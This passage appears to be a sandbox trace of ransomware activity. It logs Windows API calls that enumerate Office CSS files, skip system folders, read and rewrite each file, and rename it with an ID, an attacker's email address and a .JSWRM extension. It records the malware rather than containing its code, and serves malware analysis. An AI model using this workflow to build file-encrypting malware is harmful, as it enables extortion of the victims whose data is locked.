Flags=0x0, Size=0x1f6f0) returned 0x24c1d0 [0117.229] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f6f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f6f0, lpOverlapped=0x0) returned 1 [0117.257] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.257] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f6f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f6f0, lpOverlapped=0x0) returned 1 [0117.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.257] CloseHandle (hObject=0x314) returned 1 [0117.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0117.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0117.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0117.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0117.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0117.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0117.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.258] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME20.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme20.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME20.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme20.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0117.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0117.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0117.262] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab02bf1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab02bf1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab9b4b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eae6, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME21.CSS", cAlternateFileName="")) returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2=".") returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="..") returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="...") returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="windows") returned -1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="recovery") returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="perflogs") returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="documents and settings") returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="system volume information") returned -1 [0117.262] lstrcmpiW (lpString1="SCHEME21.CSS", lpString2="msocache") returned 1 [0117.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0117.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME21.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME21.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME21.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0117.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0117.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME21.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME21.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME21.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0117.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0117.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0117.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0117.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME21.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme21.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.263] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=125670) returned 1 [0117.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1eae0) returned 0x24c1d0 [0117.263] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1eae0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1eae0, lpOverlapped=0x0) returned 1 [0117.309] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.309] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1eae0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1eae0, lpOverlapped=0x0) returned 1 [0117.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.310] CloseHandle (hObject=0x314) returned 1 [0117.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0117.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0117.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0117.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0117.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0117.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0117.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.310] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME21.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme21.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME21.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme21.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0117.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0117.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0117.312] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab4f04e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab4f04e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fcca, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME22.CSS", cAlternateFileName="")) returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2=".") returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="..") returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="...") returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="windows") returned -1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="recovery") returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="perflogs") returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="documents and settings") returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.312] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="system volume information") returned -1 [0117.313] lstrcmpiW (lpString1="SCHEME22.CSS", lpString2="msocache") returned 1 [0117.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0117.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME22.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME22.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME22.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0117.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0117.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME22.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME22.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME22.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0117.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0117.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME22.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme22.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.314] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=130250) returned 1 [0117.314] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fcc0) returned 0x24c1d0 [0117.314] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1fcc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1fcc0, lpOverlapped=0x0) returned 1 [0117.329] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.329] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1fcc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1fcc0, lpOverlapped=0x0) returned 1 [0117.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.329] CloseHandle (hObject=0x314) returned 1 [0117.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0117.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0117.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0117.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0117.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0117.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0117.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.330] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME22.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme22.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME22.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme22.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0117.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0117.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.331] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab4f04e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab4f04e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f5fa, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME23.CSS", cAlternateFileName="")) returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2=".") returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="..") returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="...") returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="windows") returned -1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="recovery") returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="perflogs") returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="documents and settings") returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="system volume information") returned -1 [0117.331] lstrcmpiW (lpString1="SCHEME23.CSS", lpString2="msocache") returned 1 [0117.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0117.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME23.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME23.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME23.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0117.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0117.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME23.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME23.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME23.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0117.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0117.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0117.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME23.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme23.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.332] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=128506) returned 1 [0117.332] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f5f0) returned 0x24c1d0 [0117.332] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f5f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f5f0, lpOverlapped=0x0) returned 1 [0117.361] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.361] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f5f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f5f0, lpOverlapped=0x0) returned 1 [0117.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.361] CloseHandle (hObject=0x314) returned 1 [0117.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0117.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 